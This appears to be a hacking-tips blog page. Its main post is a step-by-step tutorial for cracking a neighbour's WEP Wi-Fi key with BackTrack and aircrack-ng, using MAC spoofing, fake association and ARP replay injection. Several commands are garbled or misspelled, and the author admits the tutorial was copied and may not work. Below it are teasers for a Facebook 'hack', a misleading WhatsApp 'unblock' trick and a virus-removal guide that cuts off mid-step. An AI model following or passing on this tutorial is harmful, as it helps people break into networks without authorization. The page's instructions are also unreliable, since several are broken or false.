Pages

Tuesday, July 7, 2015

How To Crack Wi-Fi Password


Step 1:- First Download Backtrack from the following link: backtrack v5 R3 backtrack v3 R1 backtrack v5 R2 backtrack v4 final backtrack v3 final

Step 2:- Burn the iso image on CD and boot your laptop from CD drive

Step 3:- Select the third boot option(VESA/KDE).

Step 4:- Once in BT3, click the tiny black box in the lower left corner to load up a "Konsole" window.

Step 5:- Type the following command.. airmon-ng Note down the interface name. In this example wifi0

Step 6:- airmon-ng stop wifi0

Step 7:- ifconfig wifi0 down

Step 8:- macchanger --mac 00:11:22:33:44:66 wifi0


Step 9:- airmon-ng start wifi0

Step 10:- airodump-ng wifi0 This will start populating Wifi networks. Press Ctrl + C to stop. Check the network with WEP encryption.. Notedown BSSID, CH and ESSID somewhere in notepad or paper.. Note that if the same BSSID is available in the second part with STATION associated with it, means you some one is accessing that network and our task will be little easier. If not than don’t worry we will still crack it..

Step 11:- airodump-ng -c (channel) -w (file name) Replace (channel) with the CH which u had already n (file name) with any name of your choice (bssid) with the BSSID..which u had already note --bssid (bssid) wifi0 Note it..Leave this console as it is and start new konsole

Step 12:- aireplay-ng -1 0 -a (bssid) - h00:11:22:33:44:66 wifi0 If you don’t get Association Successful mesage then keep on trying until you got success

Step 13:- wireplay-ng -3 -b (bssid)-h 00:11:22:33:44:66 wifi0 Well if you don’t see ARP ACK and sent packets are not increasing or still 0 than it means no 1 is accessing that network..But don’t worry you go an optional step, Leave this console as it is and start new k


Step 14:- aireplay-ng -2 –p 0841 – c FF:FF:FF:FF:FF:FF konsole message than keep on trying until you get success got an optional step konsole –b (bssid) –h 00:11:22:33:44:66 wfi0 Press y and enter Now you will see that ARP and ACK packets in 2nd console are increasing fast Keep this console as it is and start 4th console.


Step 15:- aircrack-ng -b (bssid) (filename)- Just wait and watch…..Backtrack will do rest of the work.. Hurray we got the key.. Done..!!

Note => This Tuotorial Is Taken And Collected Randomly, I'm Not Sure That It Is Working Or Not Must Share & Thanx For Visiting My Blog


Keep Visiting :

How To Hack Facebook With Memory Card

Today I Will Tell You How To Hack An Facebook Account With Memory Card, Its Is Very Simple And Easy Method Follow These Simple Steps


1- First Of All Take Your Memory Card To Your Friend

2- Then Tell Him To Open His Facebook ,

How To Unblock Yourself From Someone's Whatsapp Account


I Am Going To Post How To Unblock Yourself From Someone's Whatsapp Account 

When Someone Blocked You, But Now You Can Unblock Yourself And See His/ Her Profile Picture, Last Seen, Status And Able To Send Message OR Chat With Who Blocked You.

Follow These Below Steps -


1- Firstly Check If Your Friend's Profile Picture or Last Seen or Whatsapp Status Are Visible To You or Not, And If Not Then You Are Blocked

2- First Open Your Whatsapp Messenger

3- Goto Settings Then Click On Account

4- Now Click On Delete My Account

5- Enter Your Mobile Number And Delete Your Account

6- Now Uninstall Whatsapp From Your Mobile


7- Restart Your Mobile

8- Fill Your Mobile Number And Other Details

9- Now You Are Unblocked From Your Friend's Whatsapp Account

Its All May You Like This Trick

How to Remove Shortcut Virus From USB and Memory Card

Now a day’s Pen drives and Memory cards are the most used devices to transfer data such as movies , songs , documents etc but often  storage devices are infected by shortcut virus. If you connect your infected Pen drive to your system it will show files and folders having shortcuts. And in case you open the shortcut fie or folder it would infect your whole system badly.
This post will help you to remove shortcut virus from pendrive/USB and Memory card and recover the files.  To remove the shortcut virus use the following steps.
Do not open the shortcut file or folder otherwise the virus could infect your system.

Step 1: Connect your Pen drive or memory card.



sorry for  inconvenience

Step 2: Open command prompt. To open command prompt press windows button + R . Enter the command cmd in Run and press enter to open command prompt.

Contact Form

Name

Email *

Message *

Widgets